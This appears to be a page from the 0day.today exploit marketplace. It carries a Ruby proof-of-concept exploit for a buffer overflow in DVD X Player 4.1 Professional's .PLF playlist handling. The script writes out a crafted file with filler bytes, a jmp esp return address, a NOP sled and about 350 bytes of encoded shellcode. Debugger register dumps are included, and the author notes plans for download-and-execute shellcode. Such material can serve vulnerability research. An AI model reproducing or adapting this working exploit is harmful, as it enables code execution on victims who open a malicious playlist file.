0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
[=============================================================== DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit =============================================================== #!/usr/bin/env ruby #################################################################################################### #0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b. #First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside #A .plf file Which is InterVideo WinDVD Play list File but also Dvd x uses this file as a play #list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful #Exploitation calc will open and if it don't make sure you have the right jmp esp% #Tested on :win xp service pack 2 #Vendors web site: http://www.dvd-x-player.com/ #Esp was pointing 277 byte's in to the buffer. #And eip was over written 261 byte's in to the buffer .So i made the 17 byte's up with nop's sled. #I will be writing a c version as it will be nice to have download execute shell code as the program #Doesn't shut down but runs in the back ground #################################################################################################### # \\Debug info// #(65c.98c): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000001 ebx=77f6cf47 ecx=04450e60 edx=00000042 esi=04450348 edi=6405341c #eip=41414141 esp=0012f4ac ebp=01adfe50 iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 #41414141 ?? ??? #0:000> g #(65c.98c): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 #eip=41414141 esp=0012f0dc ebp=0012f0fc iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #41414141 ?? ??? ################################################################################### #Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex ~ Kevin Finisterre ################################################################################### #Credit goes to n00b for writing exploit and finding bug. !!! < Enjoy >. ################################################################################### Header1 = "\x63\x3A\x5c" # C:\ bof = 'A'* 257 #Fill our bufer with sh!t. shell = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ #351 bytes "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ "\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"+ "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"+ "\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"+ "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"+ "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"+ "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"+ "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"+ "\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"+ "\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"+ "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"+ "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"+ "\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"+ "\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"+ "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"+ "\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a" ret = "\x27\xB1\xFA\x77" # 4bytes // Jmp esp% in shlwapi.dll nop = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" # Ffs my nop sled 16byte's bof2 ='B'* 388 # fill the rest of the file up with sh!t. Header2 = "\x2E\x6D\x70\x33" # .mp3 n00b = Header1 + bof + ret + nop + shell + bof2 + Header2 # Build the file. File.open( "Exploit.plf","w") do |the_file| # Open the file for writing the_file.puts (n00b) # Place data from variable. the_file.close # Close end # 0day.today [2025-01-01] #